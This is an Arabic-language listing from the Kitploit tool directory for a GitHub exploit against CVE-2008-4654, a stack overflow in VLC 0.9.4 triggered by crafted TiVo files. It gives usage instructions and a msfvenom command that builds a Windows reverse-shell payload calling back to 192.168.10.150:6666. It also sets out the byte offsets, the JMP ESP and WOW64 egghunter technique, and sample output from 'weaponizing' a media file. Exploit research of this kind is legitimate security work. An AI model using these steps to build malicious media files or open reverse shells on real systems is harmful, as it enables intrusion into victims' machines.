Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2008-4654 — استغلال كامل الوظائف لثغرة تجاوز سعة المخزن المؤقت المستند إلى المكدس في مشغل الوسائط VLC من VideoLan الإصدار 0.9.4 عند معالجة ملفات TiVo. | Kitploit
أدوات/GitHubGitHub/hexastrike/cve-2008-4654
تحليل الثغرات الأمنيةالاستغلالشيل كودتوليد شيفرة القشرةتطوير الحمولاتاستغلال الملفات الثنائية
GitHubhexastrike/cve-2008-4654

CVE-2008-4654

استغلال كامل الوظائف لثغرة تجاوز سعة المخزن المؤقت المستند إلى المكدس في مشغل الوسائط VLC من VideoLan الإصدار 0.9.4 عند معالجة ملفات TiVo.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2008-4654

استغلال كامل الوظائف لثغرة تجاوز سعة المخزن المؤقت القائمة على المكدس CVE-2008-4654 في مشغل الوسائط VLC Media Player الإصدار 0.9.4 من VideoLan عند معالجة ملفات TiVo. يستهدف هذا الاستغلال برنامجًا 32-بت يعمل على نظام ويندوز 64-بت، ويستخدم egghunter من نوع WOW64 لتجاوز مساحة المكدس المحدودة.

الاستخدام

حدّث السكربت:

  • استبدل القيمة النائبة buf = b'[...]' في السكربت بكود الشيل الخاص بك (مثلًا من msfvenom).
  • يمكنك اختياريًا تعديل كود EGG_HUNTER_WOW64 إذا أردت وسمًا مختلفًا أو كان لديك egghunter مخصص.
root@kitploit:~
python .\CVE-2008-4654.py --help

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT

Transform a given TiVo file into a weapon with predefined shellcode.

options:
  -h, --help       show this help message and exit
  --input INPUT    Path to the input TiVo file to be weaponized.
  --output OUTPUT  Path where the modified (weaponized) TiVo file will be saved.

كيف يعمل

  • يبحث السكربت عن نمط بايت محدد (TIVO_PES_FILEID) في ملف TiVo.
  • يستبدل حقلًا من 4 بايت (20 بايت بعد النمط) بالقيمة b"\x00\x00\x00\xff"، مما يهيئ قراءة خارج الحدود تؤدي إلى تجاوز سعة المكدس.
  • ثم يستبدل منطقة أخرى (92 بايت بعد TIVO_PES_FILEID) بحمولة مخصصة.
  • تحتوي الحمولة على:
    • عنوان JMP ESP يوجّه التنفيذ إلى المكدس.
    • egghunter خاص بـ WOW64 يفحص الذاكرة بحثًا عن العلامة w00tw00t.
    • حمولة شيل كود كبيرة يحددها المستخدم (المرحلة الثانية) موضوعة بعد العلامة، خارج مساحة المكدس المحدودة.
  • عندما يعالج VLC ملف TiVo المعدل، فإنه يؤدي في النهاية إلى تشغيل الفائض وتنفيذ egghunter. يعثر egghunter على كود الشيل الكامل ويشغّله، متجاوزًا قيود حجم المكدس.

مثال

توليد الحمولة

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'

إنشاء ملف TiVo

  • استبدل القيمة النائبة buf = b'[...]' بكود الشيل الذي أنشأته سابقًا.
  • نزّل ملف TiVo تجريبيًا من https://samples.mplayerhq.hu/TiVo/.
root@kitploit:~
PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty

CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)

[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty

ملاحظات

  • يعمل هذا الاستغلال فقط على ويندوز x64 بسبب egghunter الخاص بـ WOW64. أما نهج x86 الخالص فيتطلب egghunter قياسيًا مناسبًا للأنظمة 32-بت.
  • لا توجد أحرف سيئة رئيسية بخلاف \x00 لهذا المتجه المحدد، مما يبسّط توليد الحمولة.
  • لمزيد من التعمق في صيد البيض (egghunting) ودقائق WOW64، اطّلع على مقال Corelan عن WOW64 Egghunter وورقة Matt (Skape) Miller.

الموارد

  • https://nostarch.com/bughunter
  • https://nvd.nist.gov/vuln/detail/CVE-2008-4654
  • https://hexastrike.com/resources/blog/exploit-development/vlc-stack-based-buffer-overflow-exploiting-cve-2008-4654-with-a-wow64-egghunter/
  • https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
  • https://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
  • https://samples.mplayerhq.hu/TiVo/
تنزيل الأداة